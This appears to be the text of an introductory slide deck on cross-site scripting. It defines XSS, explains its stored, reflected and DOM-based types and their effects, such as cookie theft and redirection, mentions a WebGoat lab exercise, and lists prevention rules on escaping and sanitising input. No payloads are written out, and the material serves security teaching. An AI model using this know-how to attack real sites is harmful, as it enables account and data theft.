 Cross –Site Scripting (XSS) Attacks are a type of

Injection , In which malicious Scripts are injected into a

Trusted Web sites.
 * Scripting
 * Cross-Site
 * Attack
 Scripting:
 Web Browsers can execute commands
◦ Embedded in HTML page
◦ Supports different languages (JavaScript, VBScript, ActiveX, etc.)
◦ Most prominent : JavaScript

 “Cross-Site” means :
 Foreign script sent via server to client
◦ Attacker „makes “ Web-Server deliver malicious script code
◦ Malicious script is executed in Client’s Web Browser

 Attack:
◦ Steal Access Credentials, Denial –of –Service , Modify Web pages
◦ Execute any command at the client machine
 XSS attacks occur when an attacker uses a web application to
send malicious code, generally in the form of a browser side
script, to a different end user.

 Flaws that allow these attacks to succeed are quite widespread

and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding
it.
 Malicious JavaScript can be used to do all sorts of
malicious tasks.
 It can be used to steal users cookies, allowing for
someone to use the website pretending to be that user.
* A Web application accepts user input.
* The input is used to create dynamic content
*The input is insufficiently validated

Users:
*An Attacker, Client
*A company’s Web Server (i.e., Web application)
 In order to run malicious JavaScript code in a victim’s
browser, an attacker must first find a way to inject a payload
into a web page that the victim visits.

 Of course, an attacker could use social engineering techniques

to convince a user to visit a vulnerable page with an injected
JavaScript payload.

 In order for an XSS attack to take place the vulnerable website

needs to directly include user input in its pages. An attacker
can then insert a string that will be used within the web page
and treated as code by the victim’s browser
 XSS attack’s first target is the Client
◦ Client trusts server (Does not expect attack)
◦ Browser executes malicious script

 But second target = Company running the Server

◦ Loss of public image (Blame)
◦ Loss of customer trust
◦ Loss of money
There are certain rules for preventing XSS .They are:
RULE #0 - Never Insert Untrusted Data Except in
Allowed Locations

RULE #1 - HTML Escape Before Inserting

Untrusted Data into HTML Element Content

RULE #2 - Attribute Escape Before Inserting

Untrusted Data into HTML Common Attributes

RULE #3 –
JavaScript Escape Before Inserting Untrusted Data
into JavaScript Data Values
RULE #4 –
CSS Escape And Strictly Validate Before Inserting
Untrusted Data into HTML Style Property Values

RULE #5 –
URL Escape Before Inserting Untrusted Data into
HTML URL Parameter Values

RULE #6 –
Sanitize HTML Markup with a Library Designed for
the Job
RULE #7 –
Prevent DOM-based XSS
There are three types of XSS
They are:
* Stored XSS,
* Reflected XSS and
* DOM-based XSS.
* The most damaging type of
XSS is Stored (Persistent)
XSS.
* Stored XSS attacks involves
an attacker injecting a script
that is permanently stored
on the target application
• * Login to Webgoat and
navigate to cross site
scripting(xss) Section. Let
us execute a Stored Cross
Site Scripting (XSS) attack.
Below is the snapshot of the
scenario.
 In Reflected XSS, the
attacker’s payload script
has to be part of the
request which is sent to
the web server and
reflected back in such a
way that it response
includes the payload
from the HTTP request
 DOM-based XSS is an
advanced type of XSS attack 
which is made possible when
the web application’s client side
scripts write user provided data
to the (DOM).

The most dangerous part of
DOM-based XSS is that the
attack is often a client-side
attack, and the attacker’s
payload is never sent to the
server.

* If the data is incorrectly

handled, an attacker can inject a
payload, which will be stored as
part of the DOM and executed
when the data is read back from
the DOM.
Access to authentication credentials for Web application
* Cookies, Username and Password
XSS is not a harmless flaw !\

* Normal users
Access to personal data (Credit card, Bank Account)

* High privileged users

Control over Web application
* Denial-of-Service
Crash Users`Browser, Pop-Up-Flodding, Redirection

* Access to Users` machine

Use ActiveX objects to control machine

* Spoil public image of company

Redirect to dialer download
Contextual output encoding/escaping of string input
Safely validating untrusted HTML input
* Cookie security
* Disabling scripts
* Emerging defensive technologies
Cross:
Site Scripting is extremly dangerous
Cause:
Missing or in-sufficient input validation
XSS:
Prevention Best Practices